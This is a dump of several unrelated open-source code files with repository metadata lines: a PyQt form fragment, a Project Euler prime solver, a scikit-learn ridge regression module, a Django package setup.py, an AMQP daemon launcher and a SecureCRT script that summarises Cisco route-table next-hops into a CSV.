self.targetRespondent = QtGui.QLineEdit(Form)
self.targetRespondent.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.targetRespondent.setObjectName(_fromUtf8("targetRespondent"))
self.verticalLayout.addWidget(self.targetRespondent)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_2.setWordWrap(True)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.purpose = QtGui.QTextEdit(Form)
self.purpose.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.purpose.setAcceptRichText(False)
self.purpose.setObjectName(_fromUtf8("purpose"))
self.verticalLayout.addWidget(self.purpose)
self.label_5 = QtGui.QLabel(Form)
self.label_5.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_5.setWordWrap(True)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout.addWidget(self.label_5)
self.instruction = QtGui.QTextEdit(Form)
self.instruction.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.instruction.setObjectName(_fromUtf8("instruction"))
self.verticalLayout.addWidget(self.instruction)
self.label_2.setBuddy(self.purpose)
self.label_5.setBuddy(self.instruction)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Target Respondent</span> - <span style=\" font-size:small;\">The people who this section is specifically trying to gather data from.</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Purpose</span> - <small>Why are the people above identified and separated, and why are they being asked these questions.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_5.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Instruction</span> - <small>Extra text about this routing and sequencing that may be shown to a respondent depending on the final questionnaire.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -7,360,708,022,024,144,000 | 54.311475 | 334 | 0.698281 | false |
rodgzilla/project-euler | problem_058/problem.py | 1 | 1801 | def _try_composite(a, d, n, s):
if pow(a, d, n) == 1:
return False
for i in range(s):
if pow(a, 2**i * d, n) == n-1:
return False
return True # n is definitely composite
def is_prime(n, _precision_for_huge_n=16):
if n in _known_primes or n in (0, 1):
return True
if any((n % p) == 0 for p in _known_primes):
return False
d, s = n - 1, 0
while not d % 2:
d, s = d >> 1, s + 1
# Returns exact according to http://primes.utm.edu/prove/prove2_3.html
if n < 1373653:
return not any(_try_composite(a, d, n, s) for a in (2, 3))
if n < 25326001:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))
if n < 118670087467:
if n == 3215031751:
return False
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))
if n < 2152302898747:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))
if n < 3474749660383:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))
if n < 341550071728321:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))
# otherwise
return not any(_try_composite(a, d, n, s)
for a in _known_primes[:_precision_for_huge_n])
def primes_on_border(n):
new_numbers = [(2 * n + 1) ** 2 - 2 * n,
(2 * n + 1) ** 2 - 4 * n,
(2 * n + 1) ** 2 - 6 * n]
return len([num for num in new_numbers if is_prime(num)])
_known_primes = [2, 3]
_known_primes += [x for x in range(5, 1000, 2) if is_prime(x)]
total = 1
primes = 0
ratio = 1
i = 1
while ratio > 0.1:
total += 4
primes += primes_on_border(i)
ratio = primes / total
i += 1
print(2 * (i - 1) + 1)
| gpl-3.0 | -2,561,185,032,495,983,000 | 32.351852 | 84 | 0.514159 | false |
cdegroc/scikit-learn | sklearn/linear_model/ridge.py | 1 | 19134 | """
Ridge regression
"""
# Author: Mathieu Blondel <[email protected]>
# License: Simplified BSD
import numpy as np
from .base import LinearModel
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
from ..grid_search import GridSearchCV
def _solve(A, b, solver, tol):
# helper method for ridge_regression, A is symmetric positive
if solver == 'auto':
if hasattr(A, 'todense'):
solver = 'sparse_cg'
else:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
if b.ndim < 2:
from scipy.sparse import linalg as sp_linalg
sol, error = sp_linalg.cg(A, b, tol=tol)
if error:
raise ValueError("Failed with error code %d" % error)
return sol
else:
# sparse_cg cannot handle a 2-d b.
sol = []
for j in range(b.shape[1]):
sol.append(_solve(A, b[:, j], solver="sparse_cg", tol=tol))
return np.array(sol).T
elif solver == 'dense_cholesky':
from scipy import linalg
if hasattr(A, 'todense'):
A = A.todense()
return linalg.solve(A, b, sym_pos=True, overwrite_a=True)
else:
raise NotImplementedError('Solver %s not implemented' % solver)
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto', tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}, optional
Solver to use in the computational routines. 'delse_cholesky'
will use the standard scipy.linalg.solve function, 'sparse_cg'
will use the a conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
tol: float
Precision of the solution.
Returns
-------
coef: array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
is_sparse = False
if hasattr(X, 'todense'): # lazy import of scipy.sparse
from scipy import sparse
is_sparse = sparse.issparse(X)
if is_sparse:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
I = sparse.lil_matrix((n_samples, n_samples))
I.setdiag(np.ones(n_samples) * alpha * sample_weight)
c = _solve(X * X.T + I, y, solver, tol)
coef = X.T * c
else:
I = sparse.lil_matrix((n_features, n_features))
I.setdiag(np.ones(n_features) * alpha)
coef = _solve(X.T * X + I, X.T * y, solver, tol)
else:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
A = np.dot(X, X.T)
A.flat[::n_samples + 1] += alpha * sample_weight
coef = np.dot(X.T, _solve(A, y, solver, tol))
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = np.dot(X.T, X)
A.flat[::n_features + 1] += alpha
coef = _solve(A, np.dot(X.T, y), solver, tol)
return coef.T
class Ridge(LinearModel):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_responses]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, normalize=False,
tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, tol=1e-3):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.tol = tol
def fit(self, X, y, sample_weight=1.0, solver='auto'):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
routines. 'delse_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the a
conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = \
self._center_data(X, y, self.fit_intercept,
self.normalize, self.copy_X)
self.coef_ = ridge_regression(X, y, self.alpha, sample_weight,
solver, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeClassifier(Ridge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def fit(self, X, y, solver='auto'):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
routines. 'delse_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the a
conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropiate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
Ridge.fit(self, X, Y, solver=solver)
return self
def decision_function(self, X):
return Ridge.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to inverse for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
**References**:
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None, copy_X=True):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
from scipy import linalg
v, Q = linalg.eigh(K)
return K, v, Q
def _errors(self, v, Q, y, alpha):
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
G_diag = np.diag(G)
# handle case when y is 2-d
G_diag = G_diag if len(y.shape) == 1 else G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, K, v, Q, y, alpha):
n_samples = y.shape[0]
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
KG = np.dot(K, G)
#KG = np.dot(np.dot(Q, np.diag(v / (v + alpha))), Q.T)
KG_diag = np.diag(KG)
denom = np.ones(n_samples) - KG_diag
if len(y.shape) == 2:
# handle case when y is 2-d
KG_diag = KG_diag[:, np.newaxis]
denom = denom[:, np.newaxis]
num = np.dot(KG, y) - KG_diag * y
return num / denom, c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples = X.shape[0]
X, y, X_mean, y_mean, X_std = LinearModel._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
K, v, Q = self._pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
M = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = self._errors(v, Q, y, sample_weight * alpha)
else:
out, c = self._values(K, v, Q, y, sample_weight * alpha)
M[:, i] = out.ravel()
C.append(c)
if error:
best = M.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), M[:, i]) for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.best_alpha = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeCV(LinearModel):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alpha]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediciton (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediciton (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validationn (efficient Leave-One-Out)
will be used.
See also
--------
Ridge, RidgeClassifierCV
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
estimator = _RidgeGCV(self.alphas, self.fit_intercept,
self.score_func, self.loss_func)
estimator.fit(X, y, sample_weight=sample_weight)
self.best_alpha = estimator.best_alpha
else:
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.best_alpha = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
class RidgeClassifierCV(RidgeCV):
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Returns
-------
self : object
Returns self.
"""
if class_weight is None:
class_weight = {}
sample_weight2 = np.array([class_weight.get(k, 1.0) for k in y])
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
RidgeCV.fit(self, X, Y,
sample_weight=sample_weight * sample_weight2)
return self
def decision_function(self, X):
return RidgeCV.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
| bsd-3-clause | -420,045,437,906,127,550 | 31.157983 | 79 | 0.580799 | false |
davidvicenteranz/drf-api-dump | setup.py | 1 | 1451 | # -*- coding: utf-8 -*-
from setuptools import setup
DESCRIPTION = """
This Django app is intended for **dump data from apps or models via HTTP**. Basically exposes
dumdata command to http.
Features:
- Just accesible by superusers
- Ability to include or exclude any specific app or model
Requirements:
- Django (Developed under v1.11)
- Django Rest Framework (Developed under v3.4.3)
More on https://github.com/davidvicenteranz/drf-api-dump/
"""
setup(
name='drf-api-dump',
version='0.1.3',
author='David Vicente Ranz',
author_email='[email protected]',
include_package_data=True,
packages=[
'drf_api_dump'
],
url='https://github.com/davidvicenteranz/drf-api-dump/',
license='MIT license',
description='Dumps data from apps or models via HTTP',
long_description=DESCRIPTION,
install_requires=[
'djangorestframework'
],
keywords='django dumpdata development',
classifiers=(
'Framework :: Django',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules'
),
) | mit | -2,079,235,607,391,890,700 | 27.470588 | 93 | 0.641626 | false |
edeposit/edeposit.amqp | bin/edeposit_amqp_ltpd.py | 1 | 2504 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
"""
AMQP binding for LTP exporter. See `edeposit.amqp.ltp
<https://github.com/edeposit/edeposit.amqp.ltp>`_ for details.
"""
import os
import sys
import os.path
import argparse
from pika.exceptions import ConnectionClosed
from edeposit.amqp.ltp import *
# if the amqp module wasn't yet installed at this system, load it from package
try:
from edeposit.amqp import settings
except ImportError:
sys.path.insert(0, os.path.abspath('../edeposit/'))
import amqp
sys.modules["edeposit.amqp"] = amqp
from edeposit.amqp.amqpdaemon import AMQPDaemon, getConParams
from edeposit.amqp import settings
# Functions & objects =========================================================
def main(args, stop=False):
"""
Arguments parsing, etc..
"""
daemon = AMQPDaemon(
con_param=getConParams(
settings.RABBITMQ_LTP_VIRTUALHOST
),
queue=settings.RABBITMQ_LTP_INPUT_QUEUE,
out_exch=settings.RABBITMQ_LTP_EXCHANGE,
out_key=settings.RABBITMQ_LTP_OUTPUT_KEY,
react_fn=reactToAMQPMessage,
glob=globals() # used in deserializer
)
if not stop and args.foreground: # run at foreground
daemon.run()
else:
daemon.run_daemon() # run as daemon
# Main program ================================================================
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == "stop":
main(None, stop=True)
sys.exit(0)
parser = argparse.ArgumentParser(
usage='%(prog)s start/stop/restart [-f/--foreground]',
description="""AMQP daemon for LTP exporter."""
)
parser.add_argument(
"action",
metavar="start/stop/restart",
type=str,
default=None,
help="Start/stop/restart the daemon."
)
parser.add_argument(
"-f",
'--foreground',
action="store_true",
required=False,
help="""Run at foreground, not as daemon. If not set, script is will
run at background as unix daemon."""
)
args = parser.parse_args()
try:
main(args)
except ConnectionClosed as e:
sys.stderr.write(
e.message + " - is the RabbitMQ queues properly set?\n"
)
sys.exit(1)
except KeyboardInterrupt:
pass
| gpl-2.0 | 4,022,404,615,706,803,700 | 26.217391 | 79 | 0.567492 | false |
garibaldi0/SecureCRT | s_nexthop_summary.py | 1 | 13227 | # $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
script_dir, script_name = os.path.split(crt.ScriptFullName)
if script_dir not in sys.path:
sys.path.insert(0, script_dir)
else:
script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
from securecrt_tools import ipaddress
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session, ask_vrf=True, vrf=None):
"""
| SINGLE device script
| Author: Jamie Caesar
| Email: [email protected]
This script will grab the route table information from a Cisco IOS or NXOS device and export details about each
next-hop address (how many routes and from which protocol) into a CSV file. It will also list all connected
networks and give a detailed breakdown of every route that goes to each next-hop.
:param session: A subclass of the sessions.Session object that represents this particular script session (either
SecureCRTSession or DirectSession)
:type session: sessions.Session
:param ask_vrf: A boolean that specifies if we should prompt for which VRF. The default is true, but when this
module is called from other scripts, we may want avoid prompting and supply the VRF with the "vrf" input.
:type ask_vrf: bool
:param vrf: The VRF that we should get the route table from. This is used only when ask_vrf is False.
:type vrf: str
"""
# Get script object that owns this session, so we can check settings, get textfsm templates, etc
script = session.script
# Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
session.start_cisco_session()
# Validate device is running a supported OS
session.validate_os(["IOS", "NXOS"])
# If we should prompt for a VRF, then do so. Otherwise use the VRF passed into the function (if any)
if ask_vrf:
selected_vrf = script.prompt_window("Enter the VRF name. (Leave blank for default VRF)")
else:
selected_vrf = vrf
# If we have a VRF, modify our commands and hostname to reflect it. If not, pull the default route table.
if selected_vrf:
send_cmd = "show ip route vrf {0}".format(selected_vrf)
session.hostname = session.hostname + "-VRF-{0}".format(selected_vrf)
logger.debug("Received VRF: {0}".format(selected_vrf))
else:
send_cmd = "show ip route"
raw_routes = session.get_command_output(send_cmd)
if session.os == "IOS":
template_file = script.get_template("cisco_ios_show_ip_route.template")
else:
template_file = script.get_template("cisco_nxos_show_ip_route.template")
fsm_results = utilities.textfsm_parse_to_dict(raw_routes, template_file)
route_list = parse_routes(fsm_results)
output_filename = session.create_output_filename("nexthop-summary", ext=".csv")
output = nexthop_summary(route_list)
utilities.list_of_lists_to_csv(output, output_filename)
# Return terminal parameters back to the original state.
session.end_cisco_session()
def update_empty_interfaces(route_table):
"""
Takes the routes table as a list of dictionaries (with dict key names used in parse_routes function) and does
recursive lookups to find the outgoing interface for those entries in the route-table where the outgoing interface
isn't listed.
:param route_table: Route table information as a list of dictionaries (output from TextFSM)
:type route_table: list of dict
:return: The updated route_table object with outbound interfaces filled in.
:rtype: list of dict
"""
def recursive_lookup(nexthop):
"""
Recursively looks up a route to find the actual next-hop on a connected network.
:param nexthop: The next-hop IP that we are looking for
:type nexthop: securecrt_tools.ipaddress
:return: The directly connected next-hop for the input network.
:rtype: securecrt_tools.ipaddress
"""
for network in connected:
if nexthop in network:
return connected[network]
for network in statics:
if nexthop in network:
return recursive_lookup(statics[network])
return None
logger.debug("STARTING update_empty_interfaces")
connected = {}
unknowns = {}
statics = {}
for route in route_table:
if route['protocol'] == 'connected':
connected[route['network']] = route['interface']
if route['protocol'] == 'static':
if route['nexthop']:
statics[route['network']] = route['nexthop']
if route['nexthop'] and not route['interface']:
unknowns[route['nexthop']] = None
for nexthop in unknowns:
unknowns[nexthop] = recursive_lookup(nexthop)
for route in route_table:
if not route['interface']:
if route['nexthop'] in unknowns:
route['interface'] = unknowns[route['nexthop']]
logger.debug("ENDING update_empty_interfaces")
def parse_routes(fsm_routes):
"""
This function will take the TextFSM parsed route-table from the `textfsm_parse_to_dict` function. Each dictionary
in the TextFSM output represents a route entry. Each of these dictionaries will be updated to convert IP addresses
into ip_address or ip_network objects (from the ipaddress.py module). Some key names will also be updated also.
:param fsm_routes: TextFSM output from the `textfsm_parse_to_dict` function.
:type fsm_routes: list of dict
:return: An updated list of dictionaries that replaces IP address strings with objects from the ipaddress.py module
:rtype: list of dict
"""
logger.debug("STARTING parse_routes function.")
complete_table = []
for route in fsm_routes:
new_entry = {}
logger.debug("Processing route entry: {0}".format(str(route)))
new_entry['network'] = ipaddress.ip_network(u"{0}/{1}".format(route['NETWORK'], route['MASK']))
new_entry['protocol'] = utilities.normalize_protocol(route['PROTOCOL'])
if route['NEXTHOP_IP'] == '':
new_entry['nexthop'] = None
else:
new_entry['nexthop'] = ipaddress.ip_address(unicode(route['NEXTHOP_IP']))
if route["NEXTHOP_IF"] == '':
new_entry['interface'] = None
else:
new_entry['interface'] = route['NEXTHOP_IF']
# Nexthop VRF will only occur in NX-OS route tables (%vrf-name after the nexthop)
if 'NEXTHOP_VRF' in route:
if route['NEXTHOP_VRF'] == '':
new_entry['vrf'] = None
else:
new_entry['vrf'] = route['NEXTHOP_VRF']
logger.debug("Adding updated route entry '{0}' based on the information: {1}".format(str(new_entry),
str(route)))
complete_table.append(new_entry)
update_empty_interfaces(complete_table)
logger.debug("ENDING parse_route function")
return complete_table
def nexthop_summary(textfsm_dict):
"""
A function that builds a CSV output (list of lists) that displays the summary information after analyzing the
input route table.
:param textfsm_dict: The route table information in list of dictionaries format.
:type textfsm_dict: list of dict
:return: The nexthop summary information in a format that can be easily written to a CSV file.
:rtype: list of lists
"""
# Identify connected or other local networks -- most found in NXOS to exlude from next-hops. These are excluded
# from the nexthop summary (except connected has its own section in the output).
logger.debug("STARTING nexthop_summary function")
local_protos = ['connected', 'local', 'hsrp', 'vrrp', 'glbp']
# Create a list of all dynamic protocols from the provided route table. Add total and statics to the front.
proto_list = []
for entry in textfsm_dict:
if entry['protocol'] not in proto_list and entry['protocol'] not in local_protos:
logger.debug("Found protocol '{0}' in the table".format(entry['protocol']))
proto_list.append(entry['protocol'])
proto_list.sort(key=utilities.human_sort_key)
proto_list.insert(0, 'total')
proto_list.insert(0, 'interface')
# Create dictionaries to store summary information as we process the route table.
summary_table = {}
connected_table = {}
detailed_table = {}
# Process the route table to populate the above 3 dictionaries.
for entry in textfsm_dict:
logger.debug("Processing route: {0}".format(str(entry)))
# If the route is connected, local or an FHRP entry
if entry['protocol'] in local_protos:
if entry['protocol'] == 'connected':
if entry['interface'] not in connected_table:
connected_table[entry['interface']] = []
connected_table[entry['interface']].append(str(entry['network']))
else:
if entry['nexthop']:
if 'vrf' in entry and entry['vrf']:
nexthop = "{0}%{1}".format(entry['nexthop'], entry['vrf'])
else:
nexthop = str(entry['nexthop'])
elif entry['interface'].lower() == "null0":
nexthop = 'discard'
if nexthop not in summary_table:
# Create an entry for this next-hop, containing zero count for all protocols.
summary_table[nexthop] = {}
summary_table[nexthop].update(zip(proto_list, [0] * len(proto_list)))
summary_table[nexthop]['interface'] = entry['interface']
# Increment total and protocol specific count
summary_table[nexthop][entry['protocol']] += 1
summary_table[nexthop]['total'] += 1
if nexthop not in detailed_table:
detailed_table[nexthop] = []
detailed_table[nexthop].append((str(entry['network']), entry['protocol']))
# Convert summary_table into a format that can be printed to the CSV file.
output = []
header = ["Nexthop", "Interface", "Total"]
header.extend(proto_list[2:])
output.append(header)
summary_keys = sorted(summary_table.keys(), key=utilities.human_sort_key)
for key in summary_keys:
line = [key]
for column in proto_list:
line.append(summary_table[key][column])
output.append(line)
output.append([])
# Convert the connected_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Connected:"])
output.append(["Interface", "Network(s)"])
connected_keys = sorted(connected_table.keys(), key=utilities.human_sort_key)
for key in connected_keys:
line = [key]
for network in connected_table[key]:
line.append(network)
output.append(line)
output.append([])
# Convert the detailed_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Route Details"])
output.append(["Nexthop", "Network", "Protocol"])
detailed_keys = sorted(detailed_table.keys(), key=utilities.human_sort_key)
for key in detailed_keys:
for network in detailed_table[key]:
line = [key]
line.extend(list(network))
output.append(line)
output.append([])
# Return the output, ready to be sent to directly to a CSV file
logger.debug("ENDING nexthop_summary function")
return output
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
if __name__ == "__builtin__":
# Initialize script object
crt_script = scripts.CRTScript(crt)
# Get session object for the SecureCRT tab that the script was launched from.
crt_session = crt_script.get_main_session()
# Run script's main logic against our session
script_main(crt_session)
# Shutdown logging after
logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
# Initialize script object
direct_script = scripts.DebugScript(os.path.realpath(__file__))
# Get a simulated session object to pass into the script.
sim_session = direct_script.get_main_session()
# Run script's main logic against our session
script_main(sim_session)
# Shutdown logging after
logging.shutdown()
| apache-2.0 | -3,942,150,797,001,814,000 | 40.46395 | 119 | 0.641113 | false |
